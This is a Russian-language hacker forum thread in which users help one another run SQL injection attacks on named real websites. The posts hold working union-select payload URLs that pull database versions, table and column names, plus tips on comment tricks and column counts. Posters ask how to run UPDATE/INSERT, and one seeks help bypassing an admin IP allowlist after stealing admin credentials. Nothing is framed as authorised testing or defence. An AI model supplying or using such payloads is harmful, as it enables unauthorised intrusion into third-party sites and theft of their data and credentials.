http://pocketbook.com.ua/index.php?id=204+union+select+0,user(),2,3,4,5,6,7,8,9,10,11,12,13,14+--+ вопрос что как здесь правильно поступить если 1 переменная в 2 или 3-х запросах mailbrush: на этом сайте пробывал не получается как ты говришь, вот http://pocketbook.com.ua/index.php?id=204'+and+'1'='2' поправь меня если мож не так понял
не сочтите за полного лола но все же еще спрошу http://www.ovacia.com.ua/news.php?id=-1'+union+select+0,1,2,3+--+ здесь вроде есть инк но ни табл ни user() ниче не работает, то есть 0,1,2,3 выводит и усе
1. Скуля есть, пятая ветка, если нашел ошибку с КАВЫЧКОЙ это вовсе не означает, что БЕЗ кавычки ты уже не сможешь повлиять на скуль запрос: Code: http://pocketbook.com.ua/index.php?id=204+and+substring(version(),1,1)=5 2. Проверяем, есть ли принтабельные поля, предварительно пытаясь подобрать их кол-во, собственно: - принтабельных полей вроде нет, вывод - слепая скуля 3. Не устраивает слепая - ищи скули в ссылках на этом же сайте по другим параметрам по второму сайту: Code: http://www.ovacia.com.ua/news.php?id=-1'+union+select+0,1,unhex(hex(version())),3+--+ Только брут
SeNaP: я уже тебе отвечал, не флуди, там конкретно есть фильтр, а то что ты -2 ввел и еррор так это просто в базу неверный запрос пошел с - числом. мож я не прав, поправьте )
http://rcc-penza.ru/content.php?action=' http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=' ошибки sql, я новичек в этом) что нибудь дальше можно сделать с этим?)
2M1ks Code: http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11--+ Code: http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,table_name,10,11+from+information_schema.tables--+ Code: http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,column_name,10,11+from+information_schema.columns+where+table_name=0x666f72756d--+ Но в бд акаунтов вроде как нет... Там походу на админку (http://rcc-penza.ru/admin) установлен .htaccess на доступ по ипу. 2S00pY Я б ему не мануалы посоветовал почитать, а хотябы поверхносно изучить БД А потом уже мануаль по скулям )
Доброго времени суток. Помогите с SQL инъекцией. по нормальному работает такой запрос: SELECT * FROM products as p, products_description as pd WHERE p.products_id IN (1) and p.products_id = pd.products_id and pd.language_id = '1' and p.products_status=1 order by pd.products_name limit 5 при определенном запросе можно влезть в IN ( ... ) например site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+IN(1 получим SELECT * FROM products as p, products_description as pd WHERE p.products_id IN (1) union select 1,2,DATABASE(),4,5,6 IN(1) and p.products_id = pd.products_id and pd.language_id = '1' and p.products_status=1 order by pd.products_name limit 5 ну и MYSQL ERROR REPORT - 13/05/2009 11:05:58 --------------------------------------- 1109 - Unknown table 'p' in field list Я не очень в SQL, потому не получается у меня состряпать что-то полезное)) Спасибо.
попробуй делать Code: site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6/* или в конце +-- или %23 или Code: site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+from+products as p, products_description as pd WHERE p.products_id+IN(1 Ну и естественно там не обязательно 6 столбцов.
это не работает... ну да, там получается 44 столбца и Code: site/compare.php?cPath=&products[]=1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,DATABASE(),37,38,39,40,41,42,43,44+from+products as p, products_description as pd WHERE p.products_id+IN(1 работает отлично.... только вот ешё вопрос: можно ли сделать UPDATE, INSERT ? и как?
У меня вот какой вопрос. я через sql enjection нашел в бд логин и пас к админке. и еще есть таблица admin_ip в ней 15 айпи. когдла я пытаюсь зайти в админку то пишет доступ запрещен. Видимо проходит проверка на ип. если мой ип совпадает с одним ип из таблицы админ_ип то меня допускают к вводу пароля. как это обойти - проверку по ип?
